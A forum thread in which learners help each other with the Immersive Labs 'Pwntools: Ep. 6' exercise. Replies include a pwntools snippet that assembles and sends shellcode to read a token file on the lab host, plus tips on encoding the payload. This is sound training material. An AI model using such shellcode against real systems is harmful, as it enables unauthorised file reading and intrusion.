Forum Discussion

kdkstudies's avatar
kdkstudies
Icon for Bronze I rankBronze I
9 months ago
Solved

Need Help for Pwntools: Ep. 6 — Demonstrate Your Skills

I'm trying to solve an lab in Immersive labs Pwntools: Ep. 6 — Demonstrate Your Skills And I got stuck in the last step. I've tried the solution for using cat2 (from https://www.reddit.com/r/immers...
application security
defensive cyber
immersive labs
  • steven's avatar
    steven
    8 months ago

    well, as indicated in reddit sub:

    ...
shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0)
shellcode = asm(shellcode)
print ("Sending Shellcode:",shellcode, " ---#")
io.send(shellcode)
io.sendline()
...

    should work.

    looking at my old solution I see that I remote connected:

    io = remote('10.102.180.68',5000)

    somehow I don't see this in your code.

    could it be (it's been a long time) that you're working on the wrong endpoint?

netcat's avatar
netcat
Icon for Silver III rankSilver III
8 months ago

For me these approaches didn't work. And while the source code suggests the shellcode is treated 100% binary, I had to encode it. After getting rid of whitespaces etc. the shellcode worked.

I can add more hints, if this was too vague.